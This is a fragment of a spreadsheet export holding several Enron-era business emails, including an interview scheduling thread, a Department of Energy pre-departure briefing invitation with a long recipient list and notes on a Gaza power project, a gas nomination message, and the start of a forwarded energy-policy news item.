karen._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shively, Hunter S.  _x000D_
Sent:	Monday, May 21, 2001 10:20 AM_x000D_
To:	Buckley, Karen_x000D_
Cc:	Lavorato, John_x000D_
Subject:	RE: Trading Track - Interviews: Wednesday May 30th_x000D_
_x000D_
Can we delay the interviews by one hour?  AGA is released at 1:00 on Wednesdays._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Buckley, Karen  _x000D_
Sent:	Friday, May 18, 2001 12:57 PM_x000D_
To:	Allen, Phillip K.; Arnold, John; Aucoin, Berney; Black, Don; Davis, Mark Dana; Gaskill, Chris; Gilbert-Smith, Doug; Gossett, Jeffrey C.; Grigsby, Mike; Herndon, Rogers; Thomas, Martin; McMichael Jr., Ed; Neal, Scott; Presto, Kevin; Schwieger, Jim; Shively, Hunter S.; Sturm, Fletcher; Superty, Robert; White, Stacey; Will, Lloyd_x000D_
Cc:	Lavorato, John; Hillis, Kimberly; Dozier, Melissa; Kitchen, Louise_x000D_
Subject:	Trading Track - Interviews: Wednesday May 30th_x000D_
_x000D_
All,_x000D_
_x000D_
We will be scheduling interviews for the Trading Track, Wednesday, May 30th from 1.00 pm to approximately 4.00 pm with a debrief afterwards.    We will be interviewing approximately 12 - 16 candidates (both internal and external)._x000D_
_x000D_
Please reserve this time in your calander.    If you are unable to particpate please let me know otherwise you will be contacted with regards to location/confirmed times/resumes/etc shortly._x000D_
_x000D_
Any questions please do not hesitate to contact me._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Karen._x000D_
x54667_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Feb 2000 02:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mac.mcclelland@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'scott.reblitz@enron.com'})</t>
  </si>
  <si>
    <t>Re: Department of Energy Pre-departure Briefing w/ Asst. Secy._x000D_
 Goldwyn</t>
  </si>
  <si>
    <t xml:space="preserve">The IPP in Gaza is progressing albeit somewhat behind schedule.  This _x000D_
combined cycle power plant is the first infrastructure development project in _x000D_
Gaza and the first by a major Western company anywhere in "Palestine."  There _x000D_
are several issues which should be addressed and may be raised during the _x000D_
Secretary's visit._x000D_
_x000D_
1.  All equipment for the plant must transit Israel.  We have been assured by _x000D_
the Israelis that movement of the equipment will not be impeded as long as it _x000D_
is on the list of equipment we provide them.  That said, there are countless _x000D_
opportunities for equipment to be delayed in Israel awaiting clearance, _x000D_
whether on the list or not.  First power could be delayed indefinitely if the _x000D_
Israelis choose to do so for political, security, or other reasons._x000D_
_x000D_
2.  Fuel for the plant, once operational, will also transit Israel.  Again, _x000D_
disruption of the fuel supply for any length of time will in effect pull the _x000D_
plug on power in Gaza.  Gas from Egypt has been discussed; it remains to be _x000D_
seen if that will be a reality anytime soon._x000D_
_x000D_
3.  Although not officially from the Israeli government, we have been told _x000D_
that as soon as the first watt of power from the plant is produced, the _x000D_
Israelis will turn off supply of electricity to Gaza.  The current _x000D_
consumption is about 110MW.  The first phase of the plant will produce 40MW.  _x000D_
This appears to be the beginning of a power supply arrangement whereby Israel _x000D_
sells Gaza electricity to make up the difference.  That electricity is likely _x000D_
to be more expensive than that which the plant will supply; Enron could well _x000D_
end up being blamed for the higher cost._x000D_
_x000D_
4.  Water is another critical issue.  The Palestinians want their own supply _x000D_
of fresh water which must necessarily be desalinated.  Israel is currently _x000D_
selling water to Gaza; it is not in Israel's best interest to lose this _x000D_
customer, therefore she may attempt to delay a desalination project._x000D_
_x000D_
5.  OPIC project funding is problematical.  Since they originally invited _x000D_
Enron to take on this project, they should necessarily also be involved.  _x000D_
Lack of OPIC support could jeopardize other project financing and drive up _x000D_
costs._x000D_
_x000D_
6.  The Israelis must also "approve" the environmental impact of the plant.  _x000D_
The plant will meet or exceed World Bank guidelines, more so when operating _x000D_
on gas.  While not a probem at this point, the Israelis could delay _x000D_
construction/operation over environmental "concerns."_x000D_
_x000D_
Andrew is the lead developer for this project and may have other issues for _x000D_
consideration.  Thanks.  Mac_x000D_
---------------------- Forwarded by Mac McClelland/ENRON_DEVELOPMENT on _x000D_
02/09/2000 08:28 PM ---------------------------_x000D_
To: Mark Schroeder/LON/ECT@ECT_x000D_
cc: Joe Hillings/Corp/Enron@ENRON, Steven J Kean/HOU/EES@EES@ECT, Mac _x000D_
McClelland/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ECT, Scott _x000D_
Reblitz/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Lora Sullivan/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Re: Department of Energy Pre-departure Briefing w/ Asst. Secy. _x000D_
Goldwyn  _x000D_
_x000D_
Mark - _x000D_
_x000D_
Good suggestion.  I spoke to Scott Rebltiz who told me that important _x000D_
decisions are to made this week at OPIC concering the Gaza project.  I will _x000D_
work with Scott and John Hardy to make sure that our message is consistent _x000D_
and helpful.  I will also work with Mac for a comprehensive update and _x000D_
strategy._x000D_
_x000D_
-Chris _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark Schroeder@ECT_x000D_
02/09/2000 06:35 AM_x000D_
To: Joe Hillings/Corp/Enron@ENRON, Chris Long/Corp/Enron@ENRON_x000D_
cc: Steven J Kean/HOU/EES@EES, Mac _x000D_
McClelland/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Department of Energy Pre-departure Briefing w/ Asst. Secy. Goldwyn_x000D_
_x000D_
Joe?Chris - this covers some of my new turf.  We have, I am told, a power _x000D_
project in Gaza that we are working on.  It is probably early days, but _x000D_
perhpas Mac mcClelland in Dubai can shed some light on whether we would want _x000D_
to get that project on the Secretary of Energy's radar screen.   mcs _x000D_
---------------------- Forwarded by Mark Schroeder/LON/ECT on 09/02/2000 _x000D_
11:33 ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Scott &lt;s-mccarthy@bciu.org&gt;                           08/02/2000 22:00_x000D_
	_x000D_
_x000D_
To: mahn@usccmail.bms.com, calbee@dfintl.com, dean.allen@pareuro.com, _x000D_
falmeida_sikorsky@compuserve.com, emily.altman@msdw.com, _x000D_
jambler@ei.enron.com, ardilal@sji.pasanjor.com, jfarminton@west.raytheon.com, _x000D_
rarmstro@submarinesystems.com, wmarnold@sepiv.shellus.com, _x000D_
julius_asboth@raytheon.com, batay@ccgate.reci.com, taustell3@msn.com, _x000D_
azevedom@winstim.com, michael_j_ball@mail.northgrum.com, _x000D_
jim.bambrick@farrell.com, hbarraza@stewart.com, marta.bascom@airtouch.com, _x000D_
rogersbeall@compuserve.com, bill.beisswanger@ey.com, _x000D_
GB191587@MSXSEPC.SHELL.COM, thane.benedict@chadbourne.com, eric.benn@bms.com, _x000D_
cbennett@pfizer.com, bennett@pbworld.com, fberger@louisberger.com, _x000D_
eberk@icfkaiser.com, bethaje@texaco.com, mbey@chevron.com, _x000D_
nbillotti@tcco.com, gbirutis@arinc.com, joe.bizzano@nrgenergy.com, _x000D_
kblanchard@haythecurley.com, martha_blaxall@dai.com, blockri@winstim.com, _x000D_
jtbolden@cat.com, fmbonge@sepiv.shellus.com, carter.booth@chase.com, _x000D_
kbosche@fioc.com, uwe.bott@gecapital.com, boydj@winstim.com, _x000D_
jboyd@sfdrill.com, rboyd@enron.com, bbradford@tda.gov, _x000D_
jbrand@telephonics.com, kevin_f_brennan@email.mobil.com, _x000D_
jesus_briceno@raytheon.com, conrad_brown@res.raytheon.com, _x000D_
brown@connellco.com, coresorces@aol.com, nburakow@icfkaiser.com, _x000D_
reburgess@duke-energy.com, mburpoe@aol.com, harold_burson@bm.com, _x000D_
kent_burton@ogden-energy.com, BurtonLD@bp.com, ljbuss@duke-energy.com, _x000D_
tom.butler@chase.com, mitchell_s_butta@mail.northgrum.com, _x000D_
campbellj@winstim.com, margaret.h.campbell@bellatlantic.com, _x000D_
dick.carano@fluordaniel.com, dante.caravaggio@jacobs.com, _x000D_
nestor.carbonell@pepsico.com, charles_l_carpenter@mail.northgrum.com, _x000D_
fernando.carrizosa@wackenhutcorp.com, solardc@bellatlantic.net, _x000D_
charles_caruso@merck.com, brian.casey@corporate.ge.com, _x000D_
rcavey@americanstandard.com, chambej@md.ahp.com, chapmana@bp.com, _x000D_
coresorces@aol.com, rohit.chaudhry@chadbourne.com, _x000D_
armando_chavez@agilent.com, stevechesebro@pennzoil.com, pccjr@energy-usa.com, _x000D_
michael_claes@bm.com, rclegg@bellhelicopter.textron.com, _x000D_
marvin_e_clifton@email.mobil.com, ned.cloonan@aig.com, wclossey@lga.att.com, _x000D_
galen.cobb@halliburton.com, mike_cochran@anadarko.com, stevec@hostpj.usa.com, _x000D_
isabella.m.cointepas@sb.com, ecole@tamsconsultants.com, _x000D_
jean.l.cole@exxon.sprint.com, michael_coleman@parsons.com, rjcolgan@cat.com, _x000D_
barclay_collins@anadarko.com, stephanie.a.conaghan@chadbourne.com, _x000D_
cconlon@tcco.com, grover@connellco.com, ted@connellco.com, _x000D_
terry@connellco.com, jcook@saralee.com, dcooper@cromor.com, _x000D_
sy_corenson@hp.com, robert_a_costa@res.raytheon.com, ron.t.covais@lmco.com, _x000D_
coxfj@texaco.com, james_s_cox@mail.northgrum.com, dcrosson@dc.edelman.com, _x000D_
susan_crowley@merck.com, fcummins@nacds.org, cunninghamj@epenergy.com, _x000D_
scurley@haythecurley.com, darbym@ms.com, ian_davis@oxy.com, _x000D_
nadavis@mail.hac.com, juan.deleon@jacobs.com, don.deline@halliburton.com, _x000D_
diane_demers@dai.com, henry_somerville@fwc.com, o-dogruer@bciu.org, _x000D_
adolcimascolo@tamsconsultants.com, chuck.dominy@halliburton.com, _x000D_
j-donald@bciu.org, cduffy@mailer.kmec.com, eduffy@skadden.com, _x000D_
loretta.dunn@hughes.com, steve.dutton@comsat.com, catherine_dwyer@nyl.com, _x000D_
david.j.earnshaw@sb.com, dedelman@edelman.com, redelman@edelman.com, _x000D_
saelbert@amoco.com, ellswp@pfizer.com, dewaem@pfizer.com, _x000D_
everett_sally@bah.com, ralph_fairbanks@kmrpower.com, robert.fallon@chase.com, _x000D_
larryfarmer@halliburton.com, mfarrar@mail.arco.com, _x000D_
steve_farrar@guardian.com, afasciano@lucent.com, andrew.fawthrop@unocal.com, _x000D_
paul_feldman@anadarko.com, mpfernandez-baca@duke-energy.com, _x000D_
dfine@corp.sbc.com, louise.finnerty@pepsi.com, peter_finnerty@csx.com, _x000D_
peter.fitzgerald@chadbourne.com, c_tanai_fleenor@parsons.com, _x000D_
stephen.flett@aexp.com, George_A_Folsom@email.msn.com, fonseyp@texaco.com, _x000D_
martyforte@mindspring.com, jefox@mintz.com, bfree@chubb.com, _x000D_
orit.frenkel@corporate.ge.com, Howard.Frey@aig.com, _x000D_
douglas.m.fried@chadbourne.com, cfrost@forbes.com, ken_frydman@edelman.com, _x000D_
sfuller@chubb.com, michael.gadbaw@corporate.ge.com, lsgaibor@compuserve.com, _x000D_
mgale@warnaco.com, marykelley.k.gannon@bellatlantic.com, sgarber@sfdrill.com, _x000D_
gard6942@mlb.com, robert_gardner@email.mobil.com, wgardner@chubb.com, _x000D_
garibaldic@sji.pasanjor.com, ken_gaulden@sealand.com, nomad68@earthlink.net, _x000D_
eugene.gay@cpmx.saic.com, dgeanacopolous@akingump.com, _x000D_
lynn.gedanken@chadbourne.com, georgen@epenergy.com, _x000D_
ralph_gerson@guardian.com, peter.getsinger@db.com, sghilaga@nacds.org, _x000D_
sghilaga@ultracom.net, gillespie@scowcroft.com, gillickj@winstim.com, _x000D_
jon_d_glassman@mail.northgrum.com, kgoddard@pw-inc.com, _x000D_
arlene_delapaz@md.northgrum.com, neil.golden@chadbourne.com, larry@pira.com, _x000D_
enrique.l.gomez@lmco.com, randy.goode@sippican.com, _x000D_
william.greason@chadbourne.com, green_candy_a@cat.com, _x000D_
james_e_green@email.mobil.com, sgreen@unocal.com, _x000D_
dave.gribbin@halliburton.com, griffm@winstim.com, jgroberg@volt.com, _x000D_
grosswo@mail.northgrum.com, richard.guay@jacobs.com, k-gut@bciu.org, _x000D_
dean.l.guttormson@exxon.sprint.com, robert_w_haines@email.mobil.com, _x000D_
jwhakkinen@marathonoil.com, bill.hale@exxon.com, hall2r@kochind.com, _x000D_
william_e_hall@parsons.com, kenneth.hansen@chadbourne.com, _x000D_
kharbert@mailer.kmec.com, jhardy@ei.enron.com, harkinr@corpdc.utc.com, _x000D_
billritten@aol.com, scott.a.harris@lmco.com, hastied9@compuserve.com, _x000D_
lhay@chevron.com, brian_healy@merck.com, hedgep@pfizer.com, _x000D_
fernando.hegel@wackenhutcorp.com, neville_henry@anadarko.com, _x000D_
lynn_azar@anadarko.com, mherber@mail.arco.com, heroldra@bp.com, _x000D_
harry.hicks@ey.com, hillj2@bp.com, thill@dfintl.com, jhillin@enron.com, _x000D_
lsulliv@enron.com, james_hilton@parsons.com, santiago_hinojosa@bm.com, _x000D_
hirshr@israelemb.org, hitchcock@pbworld.com, _x000D_
thomas.hohenthaner@chadbourne.com, Irene-hollerback@ogden-energy.com, _x000D_
richard_hook@anadarko.com, horn6945@mlb.com, shorsley@ti.com, _x000D_
shorton@pbwt.com, jahoward@bechtel.com, peter.howell@citicorp.com, _x000D_
henry.hsiang@aig.com, lhudson@unocal.com, huntington_erin_b@lilly.com, _x000D_
bichord@unocal.com, j_anthony_imler@merck.com, wmir@chevron.com, _x000D_
ashfaq@usa-intl.com, contact@usa-intl.com, ernest_r_jackson@raytheon.com, _x000D_
jago@oldworldind.com, james.l.jamerson@lmco.com, jamesch1@mail.northgrum.com, _x000D_
jarvisa@md.ahp.com, jjeffrey@dttus.com, mjichlin@louisberger.com, _x000D_
oakley.johnson@aig.com, lionel.johnson@citicorp.com, _x000D_
kevin.b.jordan@chadbourne.com, paul.kaiser@nrgenergy.com, _x000D_
george_kappaz@kmrpower.com, rfolensbee@mailer.kmec.com, _x000D_
al.kappelmann@libertymutual.com, rkarlgaard@forbes.com, _x000D_
dickey_kathryn_m@lilly.com, patricia-katayama@dc.edelman.com, _x000D_
diana.keegan@aig.com, kelleyb@epenergy.com, john.r.kelly@exxon.sprint.com, _x000D_
kathleenkell@earthlink.com, donald_s_kendall@res.raytheon.com, _x000D_
tim.kernan@fluordaniel.com, Joyce.Choate@FLUORCORP.com, skerr@mail.arco.com, _x000D_
jkessler@porterwright.com, lk@lovainc.com, lovak@prodigy.net, _x000D_
fking@bellhelicopter.textron.com, richard.g.kirkland@lmco.com, _x000D_
helena.klumpp@chadbourne.com, jknight@fioc.com, _x000D_
joy_l_koch@mail.northgrum.com, rkochman@volt.com, mkoprulu@mfi-ny.com, _x000D_
pkorff@skadden.com, kostimv@texaco.com, ans.kristbergs@farrell-lines.com, _x000D_
sandra_j_kristoff@newyorklife.com, Alex_Kulpecz@AZURIX.enron.com, _x000D_
edward.kuncar@wackenhutcorp.com, jkuspa@mailer.kmec.com, _x000D_
christoph.ladanyi@gs.com, glandegger@pw-inc.com, rlarios@corp.sbc.com, _x000D_
laudienl@epenergy.com, lawrenjd@ix.netcom.com, _x000D_
david_ledesma@AZURIX.enron.com, ed.lee@aig.com, leet@winstim.com, _x000D_
denyse.lefever@lmco.com, richard_lehfeldt@missionenergy.com, _x000D_
llenfest@oracle.com, cel@energy-usa.com, john.libonati@owenscorning.com, _x000D_
jeff.lifur@chadbourne.com, duke.ligon@dvn.com, lynn_alleva@dai.com, _x000D_
jerry.d.lindstrom@lmco.com, juan_llovet@parsons.com, _x000D_
adriana.i.griffith@parsons.com, loderw@winstim.com, wlor@chevron.com, _x000D_
losi@pbworld.com, andrew.loughlin@libertymutual.com, phil_luks@kmrpower.com, _x000D_
rodney.j.macalister@usa.conoco.com, stuart.macdonald@chase.com, _x000D_
madden@farrell-lines.com, wmaddox@bellhelicopter.textron.com, _x000D_
mariella.mahan@enron.com, michael.d.maher@exxon.com, paul.mandry@avon.com, _x000D_
marani@israelemb.org, cmarcenaro@louisberger.com, amarchetti@hess.com, _x000D_
gary.c.marfin@usa.conoco.com, mmarino@tamsconsultants.com, _x000D_
trudy.marshall@nrgenergy.com, craig.martin@jacobs.com, _x000D_
joseph.martin@chase.com, keith.martin@chadbourne.com, momartin@estee.com, _x000D_
pedro_martinez@raytheon.com, richard.mathews@avon.com, _x000D_
bmay@bellhelicopter.textron.com, norman_c_mazurek@res.raytheon.com, _x000D_
chemarie@monmouth.com, s-mccarthy@bciu.org, _x000D_
jim.mccarty@libertyinternational.com, jmcfarla@us.oracle.com, _x000D_
Bruce_C._McKay@CORP.CNG.COM, McLaughlin@pbworld.com, rmcphail@dttus.com, _x000D_
james.g.melonas@bellatlantic.com, dgmengebier@cmsenergy.com, _x000D_
sandy.merber@corporate.ge.com, michel@pbworld.com, don_mickelwait@dai.com, _x000D_
milburi@mail.northgrum.com, jrmiller2@west.raytheon.com, _x000D_
john_minihane@fwc.com, simeon_l_moats@email.mobil.com, _x000D_
boyd.montgomery@unocal.com, cmoomjian@sfdrill.com, mmoore@acec.org, _x000D_
mmorley@edelman.com, elambert.com@mindspring.com, stewart@stewart.com, _x000D_
isabel_moya@dai.com, jmoyer@warnaco.com, rmulligan@chubb.com, _x000D_
kevin.mulvey@aig.com, deborah.e.myers@sb.com, ken_nadolny@anadarko.com, _x000D_
joyce_griffin@anadarko.com, tnanney@corp.sbc.com, naraf@winstim.com, _x000D_
hernan.narea@chase.com, nathanh@winstim.com, r_d_nelson@email.mobil.com, _x000D_
james.nelson@lmco.com, ted.nevins@aig.com, twnichol@oracle.com, _x000D_
michael_nocera@newyorklife.com, Rmnorthrup@cat.com, nosseira@ms.com, _x000D_
don_o'hare@sealand.com, olougga@mail.northgrum.com, brian.oneill@chase.com, _x000D_
oneillm@labs.wyeth.com, oneill@pbworld.com, john.b.o'sullivan@chadbourne.com, _x000D_
tolic@icnpharm.com, charlie.oliver@fluordaniel.com, josborne@stewart.com, _x000D_
jeffrey_osborne@parsons.com, wayne.osterman@libertymutual.com, _x000D_
paul.ostling@ey.com, bob.oswald@aexp.com, fpandith@mintz.com, _x000D_
mpanic@icnpharm.com, robert.papas@corporate.ge.com, Nancy.Patton@parsons.com, _x000D_
c-chris.pavlides@usa.conoco.com, jon.d.pender@sb.com, _x000D_
greg_pensabene@anadarko.com, rperez_sikorsky@compuserve.com, _x000D_
cperry@fcacorp.com, speske@aol.com, phillip.peters@ey.com, BPeters@volt.com, _x000D_
karen.peterson@bms.com, daniel.c.petri@bellatlantic.com, fphelps@unocal.com, _x000D_
barbara.phillips@airtouch.com, ann_pickard@email.mobil.com, _x000D_
gapickart@cmsenergy.com, pierrelouisl@winstim.com, bud.piland@mcdermott.com, _x000D_
bmay@bellhelicopter.textron.com, joe_pinto@hp.com, jeanne_hoerter@merck.com, _x000D_
pollarb@corpdc.utc.com, dpolo@icfkaiser.com, fjp@symbolic.com, _x000D_
jody.powers@halliburton.com, george_p_pradas@email.mobil.com, _x000D_
preissj@corpdc.utc.com, prieto@pbworld.com, lprosser@dttus.com, _x000D_
kpuvak@acec.org, jrafuse@unocal.com, rragan@bechtel.com, _x000D_
rod_j_ragan@parsons.com, draymond@acec.org, eregan@tamsconsultants.com, _x000D_
ReicheEA@bp.com, walt_reichert@hp.com, charles_o_richards@amoco.com, _x000D_
tim.richards@corporate.ge.com, al_richey@anadarko.com, riverpw@texaco.com, _x000D_
jack_roadhouse@parsons.com, joseph.robertson@wackenhutcorp.com, _x000D_
irobins@volt.com, damian.robinson@aexp.com, vrocca@louisberger.com, _x000D_
lberger@louisberger.com, eric.rohtla@aig.com, mrollin@mail.arco.com, _x000D_
diana.roner@wackenhutcorp.com, rosaj@epenergy.com, kfrose@sepiv.shellus.com, _x000D_
steven.rosenberg@hbo.com, larry_rosenblatt@email.mobil.com, _x000D_
garyross@pira.com, Maria.Ruess@comsat.com, peter.ew.russell@chase.com, _x000D_
steve_rutkowski@anadarko.com, bill.ryzinski@nrgenergy.com, _x000D_
arthur.sackler@twi.com, esamara@worldspace.com, nsamara@worldspace.com, _x000D_
antranig.sarkissian@citicorp.com, luis.sastre@lmco.com, _x000D_
jsatterwhite@sikorsky.com, nancysauer@pennzoil.com, rsaul@phrma.org, _x000D_
rscharar@fcacorp.com, jeschmeltzer@pbwt.com, william.schmidt@chadbourne.com, _x000D_
pschnell@skadden.com, thomas.d.schoegler@lmco.com, rschofield@hess.com, _x000D_
marilyn.schorin@intl.pepsi.com, mschroeder@enron.com, _x000D_
pschuchter@mailer.kmec.com, aschwartz@pw-inc.com, bschweigel@oldworldind.com, _x000D_
robert.shapiro@chadbourne.com, alan.j.shepherd@mw.com, _x000D_
mollie.shields@bms.com, larry_g_shockley@parsons.com, sbsi@chevron.com, _x000D_
william.h.siefken@lmco.com, kruskaia.sierra-escalante@chadbourne.com, _x000D_
silkenatj@winstim.com, ronald.singer@ae.ge.com, elliott.slade@db.com, _x000D_
denis_slavich@kmrpower.com, midges@ms.com, steve.smith@gecapital.com, _x000D_
sandy.o'meara@gecapital.com, jack.w.snyder@lmco.com, solbera@texaco.com, _x000D_
solliea@texaco.com, francis.stankard@aexp.com, rystebbin@aol.com, _x000D_
mstewart@dc.textron.com, pstirlin@us.oracle.com, dcarlson@mailer.kmec.com, _x000D_
astraus@skadden.com, eugene.r.sullivan@chadbourne.com, _x000D_
bill_sullivan@anadarko.com, mark.f.supko@lmco.com, sally.susman@aexp.com, _x000D_
david.syphard@crssc.com, president@artleygroup.com, VTarallo@aol.com, _x000D_
tarbels@pweh.com, stephen_s_teel@res.raytheon.com, arthur.thomas@ey.com, _x000D_
c_nigel_thompson@merck.com, dick.thompson@bms.com, thorn@ei.enron.com, _x000D_
bthornton@fwtxusa.org, james_e_thrash@parsons.com, p-tichansky@bciu.org, _x000D_
jim.e.tobin@aexp.com, john.tognino@nasdaq.com, luis.torres@chadbourne.com, _x000D_
TownshME@bp.com, strendic@us.oracle.com, trevijm@texaco.com, _x000D_
jacktymann@aol.com, jtymann@worldspace.com, elizabeth.a.tyson@sb.com, _x000D_
ulrich@pbworld.com, urbans@eu1.bp.com, munnj1@bp.com, _x000D_
gvandyke@vancoenergy.com, philip.vaughn@fluordaniel.com, _x000D_
andy_veje@parsons.com, frank.verrastro@dvn.com, aracelia.vila@spcorp.com, _x000D_
judith.a.vincent@usa.conoco.com, evis65677@aol.com, _x000D_
vlachpa@mail.northgrum.com, chaim.wachsberger@chadbourne.com, _x000D_
jwalden@vancoenergy.com, peter_walters@guardian.com, _x000D_
averhulst@worldnet.att.net, eward@skadden.com, _x000D_
kenneth.j.warnock@bellatlantic.com, c-watson@bciu.org, _x000D_
mweaver@fortworthchamber.com, paul.weber@chadbourne.com, _x000D_
thomas_h_weese@ccgate.ueci.com, jwei@haythecurley.com, v-weil@bciu.org, _x000D_
joel.a.weiss@lmco.com, dwestfa@enron.com, john_m_white@eo.raytheon.com, _x000D_
jwhitman@nacds.org, scott_whitney@ogden-energy.com, jim_whittaker@hp.com, _x000D_
guenther.o.wilhelm@exxon.com, t-wilkes@bciu.org, cwilkison@worldspace.com, _x000D_
ron.will@nrgenergy.com, elizabeth.f.williamson@usa.conoco.com, _x000D_
dwillkens@dfintl.com, scarbroughs_plum@usa.net, _x000D_
Debra_Winchester@res.raytheon.com, cwindels@pfizer.com, frank.wisner@aig.com, _x000D_
wisnoskik@epenergy.com, dwolff@louisberger.com, ctompkins@louisberger.com, _x000D_
kwoodcock@aesc.com, sross@aesc.com, WoodsHR@bp.com, _x000D_
ewright@west.raytheon.com, wrightp12@bp.com, fouquepa@bp.com, _x000D_
oyandle@itsa.org, yannif@labs.wyeth.com, cordelia_m._yoon@newyorklife.com, _x000D_
lzak@mintz.com, ezsol@aol.com, lawrence.ziman@chadbourne.com, _x000D_
czimmerman@dfintl.com, dzsebik_sikorsky@compuserve.com_x000D_
cc:  _x000D_
_x000D_
Subject: Department of Energy Pre-departure Briefing w/ Asst. Secy. Goldwyn_x000D_
_x000D_
_x000D_
TO:  BCIU Members_x000D_
FROM: Scott McCarthy_x000D_
  Director of Programs_x000D_
  Ph: 212-490-0460, ext. 224_x000D_
  Fx: 212-697-8526_x000D_
_x000D_
PRE-DEPARTURE BRIEFING_x000D_
_x000D_
BCIU and the U.S. Department of Energy are pleased to announce an industry_x000D_
briefing with:_x000D_
_x000D_
ASSISTANT SECRETARY OF ENERGY DAVID GOLDWYN_x000D_
IN PREPARATION FOR ENERGY SECRETARY BILL RICHARDSON'S_x000D_
MIDDLE EAST TRIP_x000D_
(EGYPT, ISRAEL, PALESTINIAN AUTHORITY,_x000D_
 KUWAIT, AND SAUDI ARABIA)_x000D_
_x000D_
_x000D_
DATE: Thursday, February 17, 2000_x000D_
TIME: 10:30 a.m. - 11:30 a.m._x000D_
PLACE: Department of Energy_x000D_
  Room 7C016_x000D_
  1000 Independence Avenue, S.W._x000D_
  Washington, DC 20036_x000D_
_x000D_
_x000D_
Secretary of Energy Bill Richardson is visiting the Middle East February_x000D_
19-26 where he will meet with officials in Egypt, Israel, the Palestinian_x000D_
Authority, Kuwait and Saudi Arabia.  He is expected to sign bilateral_x000D_
Science and Technology Agreements (or annexes to existing agreements)_x000D_
focused on solar and renewable energy, advanced power systems, and/or_x000D_
electric vehicle programs with Egypt and Israel, as well as an Energy_x000D_
Cooperation Agreement with the Palestinian Authority.  He will meet the_x000D_
leaderships of Kuwait and Saudi Arabia on international oil company_x000D_
involvement in the upstream oil sector and other issues important to U.S._x000D_
industry._x000D_
_x000D_
BCIU invites you to join Department of Energy Assistant Secretary for_x000D_
International Affairs David Goldwyn, Deputy Assistant Secretary Theresa_x000D_
Fariello, Special Assistant to Secretary Richardson for Policy Rachel King,_x000D_
and Director for NIS, Russia and Middle East Affairs Len Coburn for an_x000D_
industry roundtable in preparation for this visit.  Companies are_x000D_
encouraged to bring background material for the Secretary's use during the_x000D_
trip to this meeting if they have not been provided to the Department of_x000D_
Energy previously._x000D_
_x000D_
If you have any questions regarding this program, please contact Jeffrey_x000D_
Donald at tel. (202) 775-6074, fax: (202) 775-6025; E-MAIL j-donald@bciu.org._x000D_
-------------------------------------------------------------_x000D_
If you would like to attend, please complete the form below and respond via_x000D_
reply e-mail OR fax your reservation to (202) 775-6025._x000D_
_x000D_
Name:____________________ Title:___________________________x000D_
_x000D_
Social Security Number (for clearance into_x000D_
 the Department of Energy):_______________________x000D_
_x000D_
Company:___________________________________________________x000D_
_x000D_
Address:___________________________________________________x000D_
_x000D_
Phone:__________________   Fax:_______________________x000D_
_x000D_
Email:____________________________________x000D_
_x000D_
Program number: 3750JD_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Dec 1999 06:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pdrexel@columbiaenergygroup.com'})</t>
  </si>
  <si>
    <t>frozenset({'dan.junek@enron.com', 'chris.germany@enron.com'})</t>
  </si>
  <si>
    <t>RG&amp;E 2000 Noms</t>
  </si>
  <si>
    <t>---------------------- Forwarded by Paul Drexelius/CES/ColumbiaGas on 12/27/99_x000D_
08:10 AM ---------------------------_x000D_
_x000D_
_x000D_
Heidi Boyd_x000D_
12/27/99 07:25 AM_x000D_
_x000D_
To: Morgan Sharifi/CES/ColumbiaGas@ColumbiaGas_x000D_
cc: Noel Bartlo/CES/ColumbiaGas@ColumbiaGas, Paul_x000D_
Drexelius/CES/ColumbiaGas@ColumbiaGas, Marianne_x000D_
Stiles/CES/ColumbiaGas@ColumbiaGas_x000D_
Subject: RG&amp;E 2000 Noms_x000D_
_x000D_
Hi Morgan, Noel, and Paul,_x000D_
_x000D_
I just received my daily volume for Jan 2000 from RG&amp;E.  That number is a CNG_x000D_
requirement of 83 dth's/day._x000D_
_x000D_
Thanks and will be sending you more soon.</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 12:08:32 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'denis.tu@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'john.keiser@enron.com', 'rod.hayslett@enron.com', 'e..rosenberg@enron.com', 'james.saunders@enron.com'})</t>
  </si>
  <si>
    <t>FW: Panel okays energy plan; St. Petersburg Times - November 16,_x000D_
 2001</t>
  </si>
  <si>
    <t xml:space="preserve">F.Y.I._x000D_
-----Original Message-----_x000D_
From: Wilson, Rob _x000D_
Sent: Monday, November 19, 2001 2:06 PM_x000D_
To: Boatman, Jack; Tu, Denis_x000D_
Cc: Kilmer III, Robert_x000D_
Subject: FW: Panel okays energy plan; St. Petersburg Times - November 16, 2001_x000D_
_x000D_
_x000D_
FYI- Note Sen. Lee's comments re: merchant plants. Only merchant plant players are suggesting the issue will be discussed by the legislature in 2002. Incumbents will probably enjoy the status quo for a couple more years._x000D_
-----Original Message-----_x000D_
From: Stiles, Billy [mailto:billy.stiles@myflorida.com]_x000D_
Sent: Friday, November 16, 2001 1:34 PM_x000D_
To: Carole Joy Barice (E-mail); David B. Struhs (E-mail); E. Leon Jacobs (E-mail); Helen A. Ferre' (E-mail); J. Dudley Goodlette (E-mail); Jack Shreve (E-mail); John J. Anderson (E-mail); Joseph K. Tannehill (E-mail); Joshua High (E-mail); Kaaren Johnson-Street (E-mail); Kenneth W. Littlefield (E-mail); Lou Frey Jr. (E-mail); Miguel De Grandy (E-mail); Sandra B. Mortham (E-mail); Sandy J. Woods (E-mail); Sanford (Sandy) V. Berg Ph. D. (E-mail); Stephen J. Mitchell (E-mail); Tom Lee (E-mail); Walter Revell (E-mail)_x000D_
Subject: Panel okays energy plan; St. Petersburg Times - November 16, 2001_x000D_
_x000D_
_x000D_
_x000D_
